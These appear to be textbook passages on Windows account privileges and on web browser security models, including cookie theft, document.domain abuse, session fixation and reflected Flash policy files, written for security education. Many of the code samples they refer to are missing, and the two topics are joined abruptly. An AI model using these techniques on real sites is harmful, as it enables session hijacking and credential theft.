machine; “What additional use are the service accounts?” Here’s where things get
sticky: Service accounts can be domain accounts or even accounts from other trusted
domains. (See the section “Trusts” later in this chapter.) Thus, credentials from other
security domains can be exposed via this flaw.
Service Hardening Services represent a large percentage of the overall attack surface in
Windows because they are generally always on and run at high privilege. Largely because
of this, Microsoft began taking steps to reduce the risk from running services in more
recent versions of the OS.
One of the first steps was to run services with least privilege, a long-accepted access
control principle. Beginning in Windows Server 2003, Microsoft created two new built-in
groups called Local Service and Network Service, and started running more services
using those lower privileged accounts rather than the all-powerful LocalSystem account.
(We’ll talk more about Local and Network Service throughout this chapter.)
In Vista, Microsoft implemented Windows Service Hardening, which defined per-
service SIDs. This effectively made certain services behave like unique users (again, as
opposed to the generic and highly privileged LocalSystem identity). Default Windows
access control settings could now be applied to resources in order to make them private
to the service, preventing other services and users from accessing the resource.
Additional features included within Service Hardening in Vista include removal of
unnecessary Windows privileges (such as the powerful debugging privilege), applying
a write-restricted access token to the service process to prevent writing to resources
that do not explicitly grant access to the Service SID, and linking Windows firewall
policy to the per-service SID to prevent unauthorized network access by the service.
For more information about Service Hardening, see “References and Further
Reading.”
The Bottom Line
Here’s a summary of Windows accounts from the malicious hacker’s perspective:
Administrators and the SYSTEM account are the juiciest targets on a Windows system
because they are the most powerful accounts. All other accounts have limited privileges
relative to Administrators and SYSTEM (one possible exception being service accounts).
Compromise of Administrators or the SYSTEM account is thus almost always the
ultimate goal of an attacker.
Groups
Groups are primarily an administrative convenience—they are logical containers for
aggregating user accounts. (They can also be used to set up e-mail distribution lists in
Windows 2000 and later, which historically have had no security implications.)
Groups are also used to allocate privileges in bulk, which can have a heavy impact on
the security of a system. Windows in its various flavors comes with built-in groups,
predefined containers for users that also possess varying levels of privilege. Any account
placed within a group inherits those privileges. The simplest example of this is the
addition of accounts to the local Administrators group, which essentially promotes the
added user to all-powerful status on the local machine. (You’ll see this attempted many
times throughout this book.) Table 2-2 lists built-in groups in Windows Server 2003.
Other versions of Windows may have fewer or different built-in groups, but those listed
in Table 2-2 are the most common.
To summarize Windows groups from the malicious hacker’s perspective:
Members of the local Administrators group are the juiciest targets on a Windows system
because members of this group inherit complete control of the local system. Domain
Admins and Enterprise Admins are the juiciest targets on a Windows domain because
members of those groups are all-powerful on every (properly configured) machine in
the domain. All other groups possess very limited privileges relative to Administrators,
Domain Admins, or Enterprise Admins. Becoming a local Administrator, Domain Admin,
or Enterprise Admin (whether via directly compromising an existing account or by
adding an already-compromised account to one of those groups) is thus almost always
the ultimate goal of an attacker.
Special Identities
In addition to built-in groups, Windows has several special identities (sometimes called
well-known groups), which are containers for accounts that transitively pass through
certain states (such as being logged on via the network) or from certain places (such as
interactively at the keyboard). These identities can be used to fine tune access control to
resources. For example, access to certain processes may be reserved for INTERACTIVE
users only (and thus blocked for all users authenticated via the network). These well-
known groups belong to the NT AUTHORITY “domain,” so to refer to their fully
qualified name, you would say NT AUTHORITY\Everyone, for example. Table 2-4 lists
the Windows special identities.
Some key points worth noting about these special identities:
The Anonymous Logon group can be leveraged to gain a foothold on a Windows
system without authenticating. Also, the INTERACTIVE identity is required in many
instances to execute privilege escalation attacks against Windows (see Chapter 7).
Restricted Groups
A pretty nifty concept that was introduced with Windows 2000, Restricted Groups allows
an administrator to set a domain policy that restricts the membership of a given group.
For example, if an unauthorized user adds himself to the local Administrators group on
a domain member, upon the next Group Policy refresh, that account will be removed so
that membership reflects that which is defined by the Restricted Groups policy. These
settings are refreshed every 90 minutes on a member computer, every 5 minutes on a
domain controller, and every 16 hours whether or not changes have occurred.
Computers (Machine Accounts)
When a Windows system joins a domain, a computer account is created. Computer
accounts are essentially user accounts that are used by machines to log on and access
resources (thus, computers are also called machine accounts). This account name appends
a dollar sign ($) to the name of the machine (machinename$).
As you might imagine, to log on to a domain, computer accounts require passwords.
Computer passwords are automatically generated and managed by domain controllers.
(See the upcoming section “Forests, Trees, and Domains.”) Computer passwords are
otherwise stored and accessed just like any other user account password. (See the
upcoming section “The SAM and Active Directory.”) By default, they are reset every 30
days, but administrators can configure a different interval if they want.
The primary use for computer accounts is to create a secure channel between the
computer and the domain controller for purposes of exchanging information. By default,
this secure channel is not encrypted (although some of the information that passes through
it is already encrypted, such as password hashes), and its integrity is not checked (thus
making it vulnerable to spoofing or man-in-the-middle attacks). For example, when a
user logs on to a domain from a domain member computer, the logon exchange occurs
over the secure channel negotiated between the member and the domain controller.
We’ve never heard of a case where exploitation of a machine account has resulted in
a serious exposure, so we will not discuss this much in this book.
User Rights
Recall the main goal of the attacker from the beginning of this chapter:
To execute commands in the most privileged context, in order to gain access to resources
and data.
We’ve just described some of the “most privileged” user mode account contexts, such
as Administrator and LocalSystem. What makes these accounts so powerful? In a word
(two words, actually), user rights. User rights are a finite set of basic capabilities, such as
logging on locally or debugging programs. They are used in the access control model in
addition to the standard comparing of access token SIDs to security descriptors. User
rights are typically assigned to groups, since this makes them easier to manage than
constantly assigning them to individual users. This is why membership in groups is so
important—because the group is typically the unit of privilege assignment.
Two types of user rights can be granted: logon rights and privileges. This is simply a
semantic classification to differentiate rights that apply before an account is authenticated
and after, respectively. More than 40 discrete user rights are available in Windows Server
2008 (code name Longhorn), and although each can heavily impact security, we discuss
only those that have traditionally had a large security impact. Table 2-5 outlines some of
the privileges we consider critical, along with our recommended configurations.
Note that the “deny” rights supersede their corresponding “allow” rights if an
account is subject to both policies.
Some user rights relevant to security were implemented in Windows Server 2003,
including the following:
• Allow logon through Terminal Services
• Deny logon through Terminal Services
• Impersonate a client after authentication
• Perform volume maintenance tasks
The Terminal Services–related rights were implemented to address a gap in the
“Allow/ deny access to this computer from the network” rights, which do not apply to
Terminal Services. The “Impersonate a client after authentication” right was added to
help mitigate privilege escalation attacks in which lower privileged services impersonated
higher privileged clients.
Last but not least in our discussion of user rights is a reminder always to use the
principle of least privilege. We see too many people logging on as Administrator-
equivalent accounts to perform daily work. By taking the time up front to consider the
appropriate user rights, most of the significant security vulnerabilities discussed in this
book can be alleviated. Log on as a lesser privileged user, and use the runas tool ) to escalate privileges when necessary.


Preventing Cross-Site Scripting

To prevent XSS, developers must be very careful of user-supplied data that is served
back to users. We define user-supplied data as any data that comes from an outside network
connection to some web application. It could be a username submitted in an HTML form
at login, a backend AJAX request that was supposed to come from the JavaScript code
the developer programmed, an e-mail, or even HTTP headers. Treat all data entering a
web application from an outside network connection as potentially harmful.
For all user-supplied data that is later redisplayed back to users in all HTTP responses
such as web pages and AJAX responses (HTTP response code 200), page not found errors
(HTTP response code 404), server errors (like HTTP response code 502), redirects (like
HTTP response code 302), and so on, the developer must do one of the following:
• Escape the data properly so it is not interpreted as HTML (to browsers) or XML
(to Flash).
• Remove characters or strings that can be used maliciously.
Removing characters generally affects user experience. For instance, if the developer
removed apostrophes (’), some people with the last name O’Reilly, or the like, would be
frustrated that their last name is not displayed properly.
We highly discourage developers to remove strings, because strings can be repre-
sented in many ways. The strings are also interpreted differently by applications and

browsers. For example, the SAMY worm took advantage of the fact that IE does not con-
sider new lines as word delimiters. Thus, IE interprets javascriptand jav%0dascr%0dipt
as the same. Unfortunately, MySpace interpreted new lines as delimiting words and al-
lowed the following to be placed on Samy’s (and others’) MySpace pages:
We recommend escaping all user-supplied data that is sent back to a web browser with-
in AJAX calls, mobile applications, web pages, redirects, and so on. However, escaping
strings is not simple; you must escape with URL encoding, HTML entity encoding, or JavaS-
cript encoding depending on where the user-supplied data is placed in the HTTP responses.

WEB BROWSER SECURITY MODELS

A variety of security controls are placed in web browsers. The key to hacking web
applications is to find a problem in one of the browser security controls or circumvent
one of the controls. Each security control attempts to be independent from the others, but
if an attacker can inject a little JavaScript in the wrong place, all the security controls
break down and only the weakest control remains—the same origin policy.
The same origin policy generally rules all security controls. However, frequent flaws
in web browsers and in browser plug-ins, such as Acrobat Reader, Flash, and Outlook
Express, have compromised even the same origin policy.
In this chapter, we discuss three browser security models as they were intended to be:
• The same origin policy
• The cookies security model
• The Flash security model
We also discuss how to use a little JavaScript to weaken some of the models.
Same Origin/Domain Policy
The same origin policy (also known as same domain policy) is the main security control
in web browsers. An origin is defined as the combination of host name, protocol, and port
number; you can think of an origin as the entity that created some web page or information
being accessed by a browser. The same origin policy simply requires that dynamic
content (for example, JavaScript or VBScript) can read only HTTP responses and cookies
that came from the same origin it came from. Dynamic content may not read content
from a different origin than from where it came. Interestingly, the same origin policy
does not have any write access control. As such, web sites can send (or write) HTTP
requests to any other web site, although restrictions may be placed on the cookies and
headers associated with sending such requests to prevent cross site requests.
The same origin policy may best be explained through examples. Suppose I have a
web page at http://foo.com/bar/baz.html with JavaScript in it. That JavaScript can
read/write some pages and not others. Table 2-1 outlines what URLs the JavaScript from
http://foo.com/bar/baz.html can access.
Exceptions to the Same Origin Policy
Browsers can be instructed to allow limited exceptions to the same origin policy
by setting JavaScript’s document.domain variable on the requested page. Namely, if
http://www.foo.com/bar/baz.html had the following in its page,
then http://xyz.foo.com/anywhere.html can send an HTTP request to http://www.foo.com/bar/baz.html and read its contents.
In this case, if an attacker can inject HTML or JavaScript in http://xyz.foo.com/
anywhere.html, the attacker can inject JavaScript in http://www.foo.com/bar/baz.html,
too. This is done by the attacker first injecting HTML and JavaScript into http://xyz
.foo.com/anywhere.html that sets the document.domain to foo.com, then loads an
iframe to http://www.foo.com/bar/baz.html that also contains a document.domain set
to foo.com, and then accesses the iframe contents via JavaScript. For example, the
following code in http://xyz.foo.com/anywhere.html will execute a JavaScript alert()
box in the www.foo.com domain:
Thus, document.domain allows an attacker to traverse domains.
In Firefox and Mozilla browsers, attackers can manipulate document.domain with
__defineGetter__() so that document.domain returns any string of the attacker’s
choice. This does not affect the browser’s same origin policy as it affects only the
JavaScript engine and not the underlying Document Object Model (DOM), but it could
affect JavaScript applications that rely on document.domain for backend cross-domain
requests. For example, suppose that a backend request to http://somesite.com/GetInfor
mation?callback=callbackFunction responded with the following HTTP body:
function callbackFunction() {
if ( document.domain == "safesite.com") {
return "Confidential Information";
}
return "Unauthorized";
}
An attacker could get the confidential information by luring a victim to the attacker’s
page that contained this script:
This HTML code sets the document.domain via __defineGetter__() and makes
a cross-domain request to http://somesite.com/GetInformation?callback=callback
Function. Finally, it calls sendInfoToEvilSite(callbackFunction()) after 1.5
seconds—a generous amount of time for the browser to make the request to somesite.
com. Therefore, you should not extend document.domain for other purposes.
What Happens if the Same Origin Policy Is Broken?
The same origin policy ensures that an “evil” web site cannot access other web sites, but
what if the same origin policy was broken or not there at all? What could an attacker do?
Let’s consider one hypothetical example.
Suppose that an attacker made a web page at http://www.evil.com/index.html that
could read HTTP responses from another domain, such as a webmail application, and the
attacker was able to lure the webmail users to http://www.evil.com/index.html. Then
the attacker would be able to read the contacts of the lured users. This would be done
with the following JavaScript in http://www.evil.com/index.html:
All your contacts are belong to us. :)
Step 1 uses an iframe named WebmailIframe to load http://webmail.foo.com/
ViewContacts, which is a call in the webmail application to gather the user’s contact list.
Step 2 waits 1 second and then runs the JavaScript function doEvil(). The delay ensures
that the contact list was loaded in the iframe. After some assurance that the contact list
has been loaded in the iframe, doEvil() attempts to access the data from the iframe in
Step 3. If the same origin policy was broken or did not exist, the attacker would have the
victim’s contact list in the variable victimsContactList. The attacker could send the
contact list to the evil.com server using JavaScript and the form in the page.
The attacker could make matters worse by using cross-site request forgery (CSRF) to
send e-mails on behalf of the victimized user to all of his or her contacts. These contacts
would receive a seemingly legitimate e-mail that appeared to be sent from their friend,
asking them to click http://www.evil.com/index.html.
Note that if the same origin policy were broken, then every web application would be
vulnerable to attack—not just webmail applications. No security would exist on the web.
A lot of research has been focused on breaking the same origin policy. And once in a
while, some pretty astonishing findings result.
Cookie Security Model
HTTP is a stateless protocol, meaning that one HTTP request/response pair has no
association with any other HTTP request/response pair. At some point in the evolution
of HTTP, developers wanted to maintain some data throughout every request/response
so that they could make richer web applications. RFC 2109 created a standard whereby
every HTTP request automatically sends the same data from the user to the server in an
HTTP header called a cookie. Both the web page and server have read/write control of
this data. A typical cookie accessed through JavaScript’s document.cookie looks like
this:
CookieName1=CookieValue1; CookieName2=CookieValue2;
Cookies were intended to store confidential information, such as authentication
credentials, so RFC 2109 defined security guidelines similar to those of the same domain
policy.
Servers are intended to be the main controller of cookies. Servers can read cookies,
write cookies, and set security controls on the cookies. The cookie security controls
include the following:
• domain This attribute is intended to act similarly to the same origin policy but
is a little more restrictive. Like the same origin policy, the domain defaults to the
domain in the HTTP request Host header, but the domain can be set to be one
domain level higher. For example, if the HTTP request was to x.y.z.com, then
x.y.z.com could set cookies for all of *.y.z.com, and x.y.z.com cannot set cookies
for all of *.z.com. Apparently, no domain may set cookies for top level domains
(TLDs) such as *.com.
• path This attribute was intended to refine the domain security model to
include the URL path. The path attribute is optional. If set, the cookie is sent
only to the server whose path is identical to the path attribute. For example, say
http://x.y.z.com/a/WebApp set a cookie with path /a; then the cookie would
be sent to all requests to http://x.y.z.com/a/* only. The cookie would not be
sent to http://x.y.z.com/index.html or http://x.y.z.com/a/b/index.html.
• secure If a cookie has this attribute set, the cookie is sent only on HTTPS
requests. Note that both HTTP and HTTPS responses can set the secure
attribute. Thus, an HTTP request/response can alter a secure cookie set over
HTTPS. This is a big problem for some advanced man-in-the-middle attacks.
• expires Usually, cookies are deleted when the browser closes. However, you
can set a date in the Wdy, DD-Mon-YYYY HH:MM:SS GMT format to store the
cookies on the user’s computer and keep sending the cookie on every HTTP
request until the expiry date. You can delete cookies immediately by setting the
expires attribute to a past date.
• HttpOnly This attribute is nowrespected by both Firefox and Internet Explorer. It
is hardly used in web applications because it was only available in Internet Explorer.
If this attribute is set, IE will disallow the cookie to be read or written via JavaScript’s
document.cookie. This intended to prevent the attacker from stealing cookies and
doing something bad. However, that attacker could always create JavaScript to do
equally bad actions without stealing cookies.
Security attributes are concatenated to the cookies like this:
CookieName1=CookieValue1; domain=.y.z.com; path=/a;
CookieName2=CookieValue2; domain=x.y.z.com; secure
JavaScript and VBScript are inaccurately considered extensions of the server code, so
these scripting languages can read and write cookies by accessing the document.cookie
variable, unless the cookie has the HttpOnly attribute set and the user is running IE. This
is of great interest to hackers, because cookies generally contain authentication credentials,
CSRF protection information, and other confidential information. Also, Man-in-the-
Middle (MitM) attacks can edit JavaScript over HTTP.
If an attacker can break or circumvent the same origin policy, the cookies can be
easily read via the DOM with the document.cookie variable. Writing new cookies is
easy, too: simply concatenate to document.cookie with this string format:
var cookieDate = new Date ( 2030, 12, 31 );
document.cookie += "CookieName=CookieValue;" +
/* All lines below are optional. */
"domain=.y.z.com;" +
"path=/a;" +
"expires=" + cookieDate.toGMTString() + ";" +
"secure;" +
"HttpOnly;"
Problems with Setting and Parsing Cookies
Cookies are used by JavaScript, web browsers, web servers, load balancers, and other
independent systems. Each system uses different code to parse cookies. Undoubtedly,
these systems will parse (and read) cookies differently. Attackers may be able to add or
replace a cookie to a victim’s cookies that will appear different to systems that expect the
cookie to look the same. For instance, an attacker may be able add or overwrite a cookie
that uses the same name as a cookie that already exists in the victim’s cookies. Consider
a university setting, where an attacker has a public web page at http://public-pages.
university.edu/~attacker and the university hosts a webmail service at https://webmail
.university.edu/. The attacker can set a cookie in the .university.edu domain that will
be sent to https://webmail.university.edu/. Suppose that cookie is named the same as
the webmail authentication cookie. The webmail system will now read the attacker’s
cookie.
The webmail system may assume the user is someone different and log him or her in to
a different webmail account. The attacker could then set up the different webmail account
(possibly his own account) to contain a single e-mail stating that the user’s e-mails were
removed due to a “security breach” and that the user must go to http://public-pages.
university.edu/~attacker/reAuthenticate (or a less obviously malicious link) to sign in
again and to see all his or her e-mail. The attacker could make the reAuthenticate link look
like a typical university sign-in page, asking for the victim’s username and password. When
the victim submits the information, the username and password would be sent to the
attacker. This type of attack is sometimes referred to as a session fixation attack, where the
attacker fixates the user to a session of the attacker’s choice.
Injecting only cookie fragments may make different systems read cookies differently,
too. Note that cookies and access controls are separated by the same character—a
semicolon (;). If an attacker can add cookies via JavaScript or if cookies are added based
on some user input, then the attacker could add a cookie fragment that may change
security characteristics or values of other cookies.
Parsing Cookies
Test for these types of attacks. Assume that man-in-the-middle attacks will be able to
overwrite even cookies that are set secure and sent over Secure Sockets Layer (SSL).
Thus, check the integrity of cookies by cross-referencing them to some session state. If
the cookie has been tampered with, make the request fail.
Using JavaScript to Reduce the Cookie Security Model
to the Same Origin Policy
The cookie security model is intended to be more secure than the same origin policy,
but with some JavaScript, the cookie domain is reduced to the security of the same origin
policy’s document.domain setting, and the cookie path attribute can be completely
circumvented.
We’ll use the university webmail example again where an attacker creates a web
page at http://public-pages.university.edu/~attacker/ and the university has a webmail
system at http://webmail.university.edu/. If a single page in http://webmail.university
.edu/ has document.domain="university.edu" (call the page http://webmail
.university.edu/badPage.html), then the attacker could steal the victim’s cookies by
luring him or her to http://public-pages.university.edu/~attacker/stealCookies.htm,
which contains the following code:
Protecting Cookies
Use the added features in the cookie security model, but do not rely on the added security
features in the cookie security model. Simply trust the same origin policy and sculpt
your web application’s security around the same origin policy.
Flash Security Model
Flash is a popular plug-in for most web browsers. Recent versions of Flash have very
complicated security models that can be customized to the developer’s preference. We
describe some interesting aspects to Flash’s security model here. However, first we
briefly describe some interesting features of Flash that JavaScript does not possess.
Flash’s scripting language is called ActionScript. ActionScript is similar to JavaScript
and includes some interesting classes from an attacker’s perspective:
• The class Socket allows the developer to create raw TCP socket connections
to allowed domains, for purposes such as crafting complete HTTP requests
with spoofed headers such as referrer. Also, Socket can be used to scan some
network computers and ports accessible that are not accessible externally.
• The class ExternalInterface allows the developer to run JavaScript in
the browser from Flash, for purposes such as reading from and writing to
document.cookie.
• The classes XML and URLLoader perform HTTP requests (with the browser
cookies) on behalf of the user to allowed domains, for purposes such as cross-
domain requests.
By default, the security model for Flash is similar to that of the same origin policy.
Namely, Flash can read responses from requests only from the same domain from which
the Flash application originated. Flash also places some security around making HTTP
requests, but you can make cross-domain GET requests via Flash’s getURL function.
Also, Flash does not allow Flash applications that are loaded over HTTP to read HTTPS
responses.
Flash does allow cross-domain communication, if a security policy on the other
domain permits communication with the domain where the Flash application resides.
The security policy is an XML file usually named crossdomain.xml and usually located
in the root directory of the other domain. The worst policy file from a security perspective
looks something like this:
This policy allows any Flash application to communicate (cross-domain) with the
server hosting this crossdomain.xml file.
The policy file can have any name and be located in any directory. An arbitrary
security policy file is loaded with the following ActionScript code:
System.security.loadPolicyFile("http://public-" +
"pages.univeristy.edu/crossdomain.xml");
If it is not in the server’s root directory, the policy applies only to the directory in
which the policy file is located, plus all subdirectories within that directory. For instance,
suppose a policy file was located in http://public-pages.university.edu/~attacker/
crossdomain.xml. Then the policy would apply to requests such as http://public-
pages.university.edu/~attacker/doEvil.html and http://public-pages.university.edu
/~attacker/moreEvil/doMoreEvil.html, but not to pages such as http://public-pages
.university.edu/~someStudent/familyPictures.html or http://public-pages.university
.edu/index.html.
Policy files are forgivingly parsed by Flash, so if you can construct an HTTP request
that results in the server sending back a policy file, Flash will accept the policy file. For
instance, suppose some AJAX request to http://www.university.edu/Course
Listing?format=js&callback=
from%20domain="*"/> responded with the following:
() { return {name:"English101",
desc:"Read Books"}, {name:"Computers101",
desc:"play on computers"}};
Then you could load this policy via the ActionScript:
System.security.loadPolicyFile("http://www.university.edu/" +
"CourseListing?format=json&callback=" +
"" +
"" +
"");
This results in the Flash application having complete cross-domain access to http://
www.university.edu/.
Many people have identified that if they can upload a file to a server containing an
insecure policy file that could later be retrieved over HTTP, then System.security
.loadPolicyFile() would also respect that policy file. Stefan Esser of www.hardened-
php.net showed that placing an insecure policy file in a GIF image also works. (See
“References and Further Reading” at the end of the chapter for more information.)
In general, it appears that Flash will respect any file containing the cross-domain
policy unless any unclosed tags or extended ASCII characters exist before
policy>. Note that the MIME type is completely ignored by Flash Player.
Protecting Against Reflected Policy Files
When sending user-definable data back to the user, you should HTML entity escape the
greater than (>) and less than (<) characters to > and <, respectively, or simply
remove those characters.